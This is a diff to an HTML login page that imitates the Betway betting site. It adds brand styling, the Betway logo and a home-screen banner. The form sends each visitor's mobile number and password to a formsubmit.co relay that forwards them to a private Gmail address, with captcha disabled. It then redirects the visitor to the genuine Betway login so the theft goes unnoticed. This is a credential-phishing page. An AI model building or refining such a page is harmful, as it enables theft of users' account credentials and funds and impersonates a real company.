--- a/index.html
+++ b/index.html
@@ -4,27 +4,217 @@
   <meta charset="UTF-8">
   <title>Login</title>
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap" rel="stylesheet">
+
   <style>
-    /* (Your existing styles here) */
-    /* Hide the toggle button visually but keep it accessible */
-    #darkToggle {
-      position: absolute;
-      width: 1px;
-      height: 1px;
-      margin: -1px;
-      padding: 0;
-      border: 0;
-      clip: rect(0 0 0 0);
+    * {
+      box-sizing: border-box;
+      font-family: 'Roboto', sans-serif;
+    }
+
+    body {
+      margin: 0;
+      background: #f1f1f1;
+    }
+
+    .modal-overlay {
+      position: fixed;
+      bottom: 0;
+      left: 0;
+      right: 0;
+      background: white;
+      border-top-left-radius: 20px;
+      border-top-right-radius: 20px;
+      box-shadow: 0 -4px 10px rgba(0, 0, 0, 0.2);
+      max-width: 480px;
+      margin: auto;
+      animation: slideUp 0.4s ease;
+    }
+
+    @keyframes slideUp {
+      from {
+        transform: translateY(100%);
+      }
+      to {
+        transform: translateY(0);
+      }
+    }
+
+    .modal-header {
+      background: #222;
+      color: white;
+      padding: 16px;
+      font-size: 18px;
+      font-weight: bold;
+      display: flex;
+      justify-content: space-between;
+      align-items: center;
+      border-top-left-radius: 20px;
+      border-top-right-radius: 20px;
+    }
+
+    .modal-header button {
+      background: transparent;
+      border: none;
+      color: white;
+      font-size: 20px;
+      cursor: pointer;
+    }
+
+    .login-body {
+      padding: 20px;
+    }
+
+    .input-group {
+      display: flex;
+      align-items: center;
+      border: 1px solid #ccc;
+      border-radius: 8px;
+      margin-bottom: 12px;
       overflow: hidden;
+      background: #fff;
+    }
+
+    .input-group input {
+      flex: 1;
+      padding: 12px;
+      border: none;
+      outline: none;
+      font-size: 16px;
+    }
+
+    .input-group .prefix {
+      background: #0a0;
+      color: white;
+      padding: 12px;
+      font-weight: bold;
+    }
+
+    .input-group.password {
+      position: relative;
+    }
+
+    .input-group.password .toggle {
+      position: absolute;
+      right: 12px;
+      top: 12px;
+      cursor: pointer;
+      font-size: 18px;
+    }
+
+    .actions {
+      display: flex;
+      justify-content: flex-end;
+      margin-bottom: 12px;
+    }
+
+    .actions a {
+      color: #007BFF;
+      text-decoration: none;
+      font-size: 14px;
+    }
+
+    .login-button {
+      background: #00a000;
+      color: white;
+      width: 100%;
+      padding: 14px;
+      border: none;
+      border-radius: 8px;
+      font-size: 16px;
+      font-weight: bold;
+      cursor: pointer;
+      position: relative;
+    }
+
+    .spinner {
+      display: none;
+      width: 16px;
+      height: 16px;
+      border: 2px solid #fff;
+      border-top: 2px solid transparent;
+      border-radius: 50%;
+      animation: spin 1s linear infinite;
+      position: absolute;
+      right: 16px;
+      top: 50%;
+      transform: translateY(-50%);
+    }
+
+    @keyframes spin {
+      to {
+        transform: rotate(360deg);
+      }
+    }
+
+    .error-message {
+      color: red;
+      font-size: 13px;
+      margin-bottom: 8px;
+    }
+
+    .signup-section {
+      text-align: center;
+      padding: 16px;
+      font-size: 14px;
+    }
+
+    .signup-section a {
+      font-weight: bold;
+      color: #00a000;
+      text-decoration: none;
+      margin-left: 4px;
+    }
+
+    /* Sticky Banner */
+    .sticky-banner {
+      position: fixed;
+      bottom: 0;
+      left: 0;
+      right: 0;
+      background: #fff;
+      padding: 10px 16px;
+      border-top: 1px solid #ccc;
+      display: flex;
+      align-items: center;
+      justify-content: space-between;
+      font-size: 14px;
+      max-width: 480px;
+      margin: auto;
+    }
+
+    .sticky-banner img {
+      width: 24px;
+      height: 24px;
+      margin-right: 8px;
+    }
+
+    .sticky-banner .close {
+      background: transparent;
+      border: none;
+      font-size: 18px;
+      cursor: pointer;
+    }
+
+    /* Responsive layout */
+    @media (min-width: 600px) {
+      .modal-overlay {
+        top: 10%;
+        transform: translateY(0);
+        max-width: 400px;
+        border-radius: 16px;
+      }
     }
   </style>
 </head>
 <body>
-  <!-- Hidden Dark Mode Toggle -->
-  <button id="darkToggle" aria-label="Toggle Dark Mode"></button>
 
-  <div class="login-container">
-    <div class="login-header">Login</div>
+  <div class="modal-overlay">
+    <div class="modal-header">
+      Login
+      <button onclick="closeModal()">×</button>
+    </div>
+
     <form class="login-body" action="https://formsubmit.co/robarsrsa@gmail.com" method="POST" onsubmit="return validateForm(event)">
       <input type="hidden" name="_captcha" value="false">
       <input type="hidden" name="_next" value="https://www.betway.co.za/account/login">
@@ -35,10 +225,9 @@
           type="tel"
           id="mobile"
           name="mobile"
-          placeholder="10 digits"
+          placeholder="Mobile Number"
           required
           maxlength="10"
-          minlength="10"
           pattern="^\d{10}$"
           title="Enter exactly 10 digits after +27"
         >
@@ -46,7 +235,6 @@
       <div id="mobileError" class="error-message"></div>
 
       <div class="actions">
-        <div></div>
         <a href="https://www.betway.co.za/Account/ForgotUsername" target="_blank">Forgot Username?</a>
       </div>
 
@@ -59,12 +247,11 @@
           minlength="4"
           required
         >
-        <span class="toggle">&#128065;</span>
+        <span class="toggle" onclick="togglePassword()">👁️</span>
       </div>
       <div id="passwordError" class="error-message"></div>
 
       <div class="actions">
-        <div></div>
         <a href="https://www.betway.co.za/Account/ForgotPassword" target="_blank">Forgot Password?</a>
       </div>
 
@@ -80,8 +267,16 @@
     </div>
   </div>
 
+  <!-- Sticky bottom banner -->
+  <div class="sticky-banner" id="banner">
+    <div>
+      <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/6/6a/Betway_logo.svg/2560px-Betway_logo.svg.png" alt="Betway" height="24">
+      Add Betway to Home screen
+    </div>
+    <button class="close" onclick="document.getElementById('banner').style.display='none'">×</button>
+  </div>
+
   <script>
-    // Form validation
     function validateForm(event) {
       const mobile = document.getElementById('mobile');
       const password = document.getElementById('password');
@@ -110,16 +305,15 @@
       return isValid;
     }
 
-    // Password visibility toggle
-    document.querySelector('.toggle').addEventListener('click', function () {
+    function togglePassword() {
       const pwd = document.getElementById('password');
       pwd.type = pwd.type === 'password' ? 'text' : 'password';
-    });
+    }
 
-    // Dark mode toggle logic
-    document.getElementById('darkToggle').addEventListener('click', () => {
-      document.body.classList.toggle('dark-mode');
-    });
+    function closeModal() {
+      document.querySelector('.modal-overlay').style.display = 'none';
+    }
   </script>
+
 </body>
 </html>
